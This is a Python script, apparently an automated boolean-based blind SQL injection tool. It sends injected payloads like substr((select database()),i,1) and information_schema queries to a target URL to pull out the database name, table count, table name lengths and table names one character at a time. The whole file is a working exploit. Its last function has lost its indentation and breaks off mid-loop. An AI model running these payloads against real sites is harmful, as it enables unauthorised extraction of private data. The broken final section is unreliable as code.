import requests
import re
# Author: wf
# Length of the current database's name (boolean-based blind SQLi oracle)
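def database_len(max_len=30):
    """Return the length of the current database name, or ``None``.

    Probes ``length(database())={i}`` for every ``i`` in ``range(max_len)``
    and returns the first ``i`` whose response matches the success pattern.

    Relies on module globals: ``main_url`` (the injection point; the payload
    is appended after a closing single quote and ends in ``--+``) and ``zz``
    (regex that identifies a TRUE response).

    Args:
        max_len: exclusive upper bound on the lengths probed (default 30,
            so names of 30+ characters are reported as ``None``).

    Returns:
        int length confirmed by the oracle, or ``None`` if none matched.
    """
    for i in range(max_len):
        database_len_url = f"{main_url}' and length(database())={i}--+"
        print(database_len_url)
        # NOTE: requests.get() has no default timeout, so a stalled target
        # blocks this loop indefinitely.
        html = requests.get(database_len_url).text
        # Only truthiness is needed, so re.search (stops at first hit) is
        # equivalent to collecting every match.
        if re.search(zz, html):
            return i
    return None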
# Name of the current database, recovered one character at a time
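def database(database_len):
    """Recover the current database name character by character.

    For each position ``1..database_len`` tries every candidate in the module
    global ``fuzz`` with ``substr((select database()),{i},1)='{key}'`` and
    keeps the first candidate whose response matches the success regex ``zz``.

    Args:
        database_len: number of characters to recover (normally the value
            returned by ``database_len()``); coerced with ``int()``.

    Returns:
        The recovered name. A position for which no candidate matches is
        skipped silently, so the result can be shorter than ``database_len``.

    Assumes each entry of ``fuzz`` is a single character with no ``'`` or
    ``\\`` in it, since it is interpolated into a quoted SQL literal — TODO
    confirm against the caller's candidate list.
    """
    chars = []
    for i in range(1, int(database_len) + 1):
        for key in fuzz:
            payload_database = f"{main_url}' and substr((select database()),{i},1)='{key}'--+"
            print(payload_database)
            html = requests.get(payload_database).text
            if re.search(zz, html):
                chars.append(key)
                # Stop at the first hit: it saves the remaining requests for
                # this position, and if the target collation compares
                # case-insensitively (MySQL's default) both 'a' and 'A' would
                # otherwise match and the character would be appended twice.
                break
    return "".join(chars)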
# Number of tables in the current database
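def table_num(max_tables=100):
    """Return the number of tables in the target schema, or ``None``.

    Probes ``count(table_name)`` from ``information_schema.tables`` for the
    schema named by the module global ``database`` against each value in
    ``range(max_tables)`` and returns the first one the oracle confirms.

    NOTE(review): in this file ``database`` is also the name of a function;
    the caller presumably rebinds it to the recovered schema-name string
    before calling this, otherwise the function's repr is interpolated into
    the SQL — confirm.

    Args:
        max_tables: exclusive upper bound on the counts probed (default 100).

    Returns:
        int table count, or ``None`` if no value in range matched.
    """
    for i in range(max_tables):
        table_num_url = f"{main_url}' and (select count(table_name) from information_schema.tables where table_schema='{database}')='{i}'--+"
        print(table_num_url)
        html = requests.get(table_num_url).text
        if re.search(zz, html):
            return i
    return None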
# Length of each table name in the current database
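def table_len_num(max_len=100):
    """Return ``[offset, length]`` pairs for the tables of the target schema.

    For each ``offset`` in ``range(table_num)`` (module global holding the
    table count) probes ``length(<table_name at LIMIT offset,1>)={j}`` for
    ``j`` in ``range(max_len)`` and records the first ``j`` the oracle
    confirms.

    Args:
        max_len: exclusive upper bound on the name lengths probed.

    Returns:
        list of two-element lists ``[offset, length]``. ``offset`` is the
        LIMIT offset that selects that table in ``information_schema.tables``
        and is what later extraction passes back. A table whose length is
        not found within ``max_len`` is omitted; the offsets of the other
        entries are unaffected.
    """
    lengths = []
    for offset in range(table_num):
        for j in range(max_len):
            table_len_url = f"{main_url}' and length(substr((select table_name from information_schema.tables where table_schema='{database}' limit {offset},1),1))={j}--+"
            print(table_len_url)
            html = requests.get(table_len_url).text
            if re.search(zz, html):
                # Record the real LIMIT offset rather than a running count of
                # hits: a counter falls behind after any table whose length
                # is missed, and every later length would then be paired
                # with the wrong table.
                lengths.append([offset, j])
                break
    return lengths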
# All table names in the current database
def table():
tablelist=[]
for i in table_len_num: #表长度
table=''
bool2=False
while 1:
bool1=False
for j in range(1,i[1]+1): #i[0] 1 2 3 4 i[1] 6 8 7 5
for key in fuzz:
payload_table=f"{main_url}' and substr((select table_name from information_schema.tables where table_schema='{database}' limit {i[0]},1),{j},1)='{key}'--+ "
print(payload_table)
html=requests.get(payload_table).text
if(re.findall(zz,html)):